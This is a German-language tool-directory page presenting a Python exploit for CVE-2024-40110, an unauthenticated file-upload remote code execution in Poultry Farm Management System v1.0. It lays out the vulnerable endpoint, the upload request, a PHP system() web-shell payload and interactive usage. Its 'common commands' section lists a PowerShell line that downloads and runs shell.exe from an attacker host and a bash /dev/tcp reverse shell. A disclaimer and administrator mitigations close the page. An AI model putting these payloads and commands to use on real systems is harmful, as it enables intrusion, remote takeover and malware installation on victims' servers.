Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-40110 — Python-Exploit für nicht authentifizierte Remote-Code-Ausführung durch Datei-Upload im Poultry Farm Management System v1.0. Lädt PHP-Shells hoch, um beliebige Systembefehle auf anfälligen Zielen auszuführen. | Kitploit
Tools/GitHubGitHub/angry-althaf/cve-2024-40110
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubangry-althaf/cve-2024-40110

CVE-2024-40110

Python-Exploit für nicht authentifizierte Remote-Code-Ausführung durch Datei-Upload im Poultry Farm Management System v1.0. Lädt PHP-Shells hoch, um beliebige Systembefehle auf anfälligen Zielen auszuführen.

Repository anzeigen
vor 7 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Poultry Farm Management System v1.0 – RCE-Exploit

Schwachstellentyp

Nicht authentifizierter Dateiupload mit Remote Code Execution

Beschreibung

Das Poultry Farm Management System v1.0 enthält eine kritische Schwachstelle in der Produkt-Upload-Funktion. Die Anwendung validiert und bereinigt Datei-Uploads nicht ordnungsgemäß, sodass Angreifer als Produktbilder getarnte PHP-Dateien hochladen können. Diese hochgeladenen PHP-Dateien können ausgeführt werden, um eine Remote Code Execution zu erreichen.

Angreifbarer Endpunkt

root@kitploit:~
POST /paultry/farm/product.php oder POST /farm/product.php

Angriffsvektor

Die Schwachstelle kann wie folgt ausgenutzt werden:

  1. Senden einer POST-Anfrage an den Produkt-Upload-Endpunkt
  2. Hochladen einer PHP-Shell-Datei mit beliebigen Befehlen
  3. Zugriff auf die hochgeladene Datei, um die eingebetteten Befehle auszuführen

Voraussetzungen

Erforderliche Komponenten

  • Python 3.7+
  • Bibliothek requests
  • Bibliothek colorama (für farbige Ausgabe)
  • Netzwerkzugriff auf das angreifbare Ziel

Installation

root@kitploit:~
pip install requests colorama

Oder alle Abhängigkeiten installieren:

root@kitploit:~
pip install -r requirements.txt

Verwendung

Grundlegende Verwendung

Skript interaktiv ausführen:

root@kitploit:~
python exploit.py

Das Skript fordert Sie auf:

  1. Ziel-IP-Adresse – Die IP-Adresse des angreifbaren Servers
  2. Ziel-Port – Die Portnummer (Standard: 80)
  3. Auszuführender Befehl – Der Systembefehl, der auf dem Ziel ausgeführt werden soll

Beispiel

root@kitploit:~
==================================================
Interaktives Backdoor-Upload-Tool
==================================================

Ziel-IP-Adresse eingeben: 192.168.1.100
Ziel-Port eingeben (Standard: 80): 8080
Auszuführenden Befehl eingeben (Standard: powershell-payload):
Befehl: whoami

==================================================
BESTÄTIGUNG
==================================================
Ziel-URL: http://192.168.1.100:8080
Befehl: whoami
Möchten Sie fortfahren? (ja/nein): ja

Funktionen

✅ Interaktive Eingabe – Aufforderung nach IP, Port und benutzerdefinierten Befehlen
✅ Standardwerte – Sinnvolle Voreinstellungen für Komfort
✅ Farbcodierte Ausgabe – Leicht lesbare farbige Terminalausgabe
✅ Bestätigungsschritt – Einstellungen vor der Ausführung überprüfen
✅ Fehlerbehandlung – Verständliche Fehlermeldungen bei fehlgeschlagenen Anfragen
✅ Flexible Befehle – Unterstützung für beliebige Shell-Befehle oder PowerShell-Payloads

Häufige Befehle

Windows-Ziele

root@kitploit:~
powershell -Command "Invoke-WebRequest http://angreifer-ip:8787/shell.exe -OutFile shell.exe; Start-Process shell.exe"

Linux-Ziele

root@kitploit:~
bash -i >& /dev/tcp/angreifer-ip/4444 0>&1

Informationssammlung

root@kitploit:~
whoami
id
ifconfig
hostname
pwd

Technische Details

Funktionsweise

  1. Datei-Upload: Sendet eine POST-Anfrage mit einem PHP-Payload, das als Datei eingebettet ist
  2. Payload-Ausführung: Die hochgeladene PHP-Datei wird in /assets/img/productimages/ gespeichert
  3. Befehlsausführung: Der Zugriff auf die PHP-Datei löst die Befehlsausführung über die system()-Funktion aus
  4. Ausgabeabruf: Das Skript ruft die Ausgabe über eine GET-Anfrage ab

Anfragestruktur

root@kitploit:~
POST /paultry/farm/product.php
Content-Type: multipart/form-data

category=CHICKEN
product=rce
price=100
save=
productimage=[PHP_PAYLOAD]

Payload-Format

root@kitploit:~
<?php system('BEFEHL_HIER');?>

Testumgebung

Der Exploit wurde getestet auf:

  • Betriebssystem: Windows 10
  • Server: XAMPP v3.3.0
  • PHP-Version: Kompatibel mit PHP 5.6+

Haftungsausschluss

⚠️ RECHTLICHER HINWEIS

Dieses Tool wird ausschließlich für autorisierte Sicherheitstests und zu Bildungszwecken bereitgestellt. Unautorisierter Zugriff auf Computersysteme ist illegal.

  • Verwenden Sie diesen Exploit nur auf Systemen, die Ihnen gehören oder für die Sie eine ausdrückliche schriftliche Erlaubnis zum Testen haben
  • Die Autoren übernehmen keine Haftung für Missbrauch oder Schäden, die durch dieses Tool verursacht werden
  • Die Nutzer sind dafür verantwortlich, dass sie alle geltenden Gesetze und Vorschriften einhalten
  • Unautorisierter Zugriff, Veränderung oder Störung von Computersystemen ist gemäß dem Computer Fraud and Abuse Act (CFAA) und ähnlichen Gesetzen weltweit eine Straftat

Gegenmaßnahmen

Für Administratoren

  1. Software aktualisieren – Sicherheitspatches anwenden, falls verfügbar

  2. Datei-Upload-Validierung

    • Dateierweiterungen validieren (Whitelist: jpg, png, gif usw.)
    • MIME-Typen serverseitig prüfen
    • Hochgeladene Dateien außerhalb des Web-Roots speichern
    • Skriptausführung in Upload-Verzeichnissen deaktivieren
  3. Konfiguration

    root@kitploit:~
    <Directory /uploads>
        php_flag engine off
        AddType text/plain .php .phtml .php3 .php4 .php5 .phar
    </Directory>
    
  4. Zugriffskontrolle

    • Authentifizierung vor dem Hochladen implementieren
    • Benutzerberechtigungen validieren
    • Ratenbegrenzung hinzufügen
  5. Überwachung

    • Upload-Verzeichnisse auf verdächtige Dateien überwachen
    • Alle Upload-Versuche protokollieren
    • Dateiintegritätsprüfung implementieren

Referenzen

  • Exploit DB: https://www.exploit-db.com/exploits/52053
  • GitHub: https://github.com/w3bn00b3r/Unauthenticated-Remote-Code-Execution-RCE---Poultry-Farm-Management-System-v1.0/
  • Original-Software: https://www.sourcecodester.com/php/15230/poultry-farm-management-system-free-download.html

Fehlerbehebung

Verbindung abgelehnt

root@kitploit:~
Fehler: Verbindung abgelehnt
Lösung: Überprüfen Sie, ob die Ziel-IP und der Port korrekt sind und die Anwendung läuft

404 Nicht gefunden

root@kitploit:~
Fehler: Shell-Upload fehlgeschlagen. Statuscode: 404
Lösung: Der Endpunkt-Pfad kann abweichen. Häufige Pfade: /farm/, /paultry/farm/

PHP nicht ausgeführt

root@kitploit:~
Fehler: Befehlsausgabe ist leer
Lösung: Die PHP-Ausführung könnte deaktiviert sein oder die Datei wurde nicht korrekt hochgeladen

Support

Bei Problemen, Fragen oder Verbesserungsvorschlägen wenden Sie sich bitte an das GitHub-Repository oder die Exploit-DB-Seite.


Letzte Aktualisierung: Dezember 2024
Status: Verifiziert und getestet

Tool herunterladen